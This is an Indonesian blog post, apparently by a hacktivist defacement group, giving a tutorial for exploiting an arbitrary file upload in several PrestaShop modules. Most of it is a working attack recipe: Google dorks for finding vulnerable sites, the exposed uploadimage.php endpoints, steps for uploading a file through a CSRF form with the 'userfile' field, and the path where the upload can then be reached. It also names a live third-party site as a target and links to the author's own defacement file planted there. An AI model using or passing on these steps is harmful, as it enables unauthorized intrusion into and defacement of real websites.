header

PRESTASHOP ARBITARY FILE UPLOAD

Tuesday, October 29, 2019 1 Comment Edit



Assalamualaikum...
Kemaren denger-denger tim Anon All Indo mau dibangkitin gan, menurut kalian gimana? Hoax atau engga gan?

Kemarin malam pas aku nyimak kalau keluarga kecil ini mau dibangkitin, ada seorang sultan yang baik hati dan dengan ikhlas memberikan domain ini untuk keluarga kecil kami. Terima kasih kepada IrBibel.

Pada artikel kali ini, saya akan memberikan tutorial deface untuk website yang menggunakan cms prestashop. Pasti untuk kalian sudah tidak asing lagi, jadi untuk para mastah kami minta sarannya ya, kalau saya ada salah silahkan kasih saran ataupun kritikan dengan berkomentar dibawah.

Baca juga : •Penyebab dan cara mengatasi hp panas


Bahan:

Dork : Inurl:"/modules/columnadverts/"

   Inurl:"/modules/homepageadvertise/"

   Inurl:"/modules/productpageadverts/"

   Inurl:"/modules/simpleslideshow/"

   Inurl:"/modules/vtemslideshow/"

   Index Of "/modules/columnadverts/"

   Index Of "/modules/homepageadvertise/"

   Index Of "/modules/productpageadverts/"

   Index Of "/modules/simpleslideshow/"

   Index Of "/modules/vtemslideshow/"




Exploit: http://loclahost/ modules/columnadverts/uploadimage.php

 http://localhost/ modules/homepageadvertise/uploadimage.php

 http://localhost/ modules/productpageadverts/uploadimage.php

 http://localhost/ modules/simpleslideshow/uploadimage.php

 http://localhost/ modules/vtemslideshow/uploadimage.php


Csrf online.. silahkan cari digugel. Bejibun gan

Live target: http://plantasygambas.com/modules/columnadverts/uploadimage.php


Tutorial:


Dorking->> kasih exploitnya->>
Contoh : http://plantasygambas.com/modules/columnadverts/uploadimage.php

Itu ada tulisan error berarti webnya vuln

Go to csrf ->>

1.masukin sitenya
2.kolom bawah isi dgn userfile
3.trus upload file kalian

How to acces my file??

http://site.com/modules/columnadverts/uploadimage.php

Ganti jadi

http://site.com/modules/columnadverts/slides/yourfile.php


Punya me :
http://plantasygambas.com/modules/columnadverts/slides/an.html

Mungkin sekian yang bisa saya sampaikan. Jangan lupa memberi saran ataupun kritikan dengan berkomentar dibawah.
Terimakasih, wassalamu'alaikum wr.wb



1 Response to "PRESTASHOP ARBITARY FILE UPLOAD"

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1